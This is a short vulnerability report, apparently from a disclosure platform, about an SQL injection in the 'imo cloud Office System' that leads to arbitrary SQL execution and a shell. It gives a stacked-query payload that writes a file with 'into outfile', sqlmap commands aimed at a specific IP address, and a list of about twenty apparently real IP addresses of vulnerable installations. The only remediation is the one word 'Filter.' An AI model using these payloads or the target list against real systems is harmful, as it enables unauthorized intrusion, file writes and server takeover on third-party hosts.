Arbitrary SQL Execution Vulnerability (getshell) in the imo cloud Office System)

Arbitrary SQL Execution Vulnerability (getshell) in the imo cloud Office System)

Rt

This vulnerability is an SQL injection vulnerability. However, the mysql PDO query system can execute multiple statements, which is equivalent to arbitrary SQL statement execution.

Files with vulnerabilities:
 

/Customize/Audit/MessageMonitor/groupSearch.php?id=1/Customize/Audit/MessageMonitor/mutilSearch.php?id=1/Customize/Audit/MessageMonitor/singleSearch.php?uid=1))

Execute the select statement to write files to the server:
 

http://218.247.15.55/Customize/Audit/MessageMonitor/groupSearch.php?id=1;select 0x776F6F79756E2E6F7267 into outfile '/tmp/wooyun.txt'%23

 

Use sqlmap to Test 1:
 

sqlmap.py -u "http://218.247.15.55/Customize/Audit/MessageMonitor/singleSearch.php?uid=1))*" --random-agent --dbms=mysql

 

Use sqlmap to Test 2:
 

sqlmap.py -u "http://218.247.15.55/Customize/Audit/MessageMonitor/groupSearch.php?id=1" --random-agent --dbms=mysql --dbs

 

There are many examples of using this system:
 

http://124.127.184.106/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://218.247.15.55/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://220.249.78.238/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://221.2.165.51/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://114.112.88.208/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://61.186.41.230/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://61.128.175.188:8000/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://120.33.48.13:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://120.33.48.12:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://116.228.58.90:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://218.247.15.55/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://60.2.187.226:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://60.2.41.246/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://221.5.224.65:8000/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://58.118.64.9/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://42.49.39.72:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://114.247.46.73/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://183.64.106.66/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://219.148.143.126:81/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://122.10.19.52/server/page_download http://220.249.78.238/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://211.142.200.34/Customize/Audit/MessageMonitor/groupSearch.php?id=1http://221.224.21.25:8888/Customize/Audit/MessageMonitor/groupSearch.php?id=1 

sqlmap.py -u "http://218.247.15.55/Customize/Audit/MessageMonitor/groupSearch.php?id=1" --random-agent --dbms=mysql --dbs

 

 

Solution:

Filter.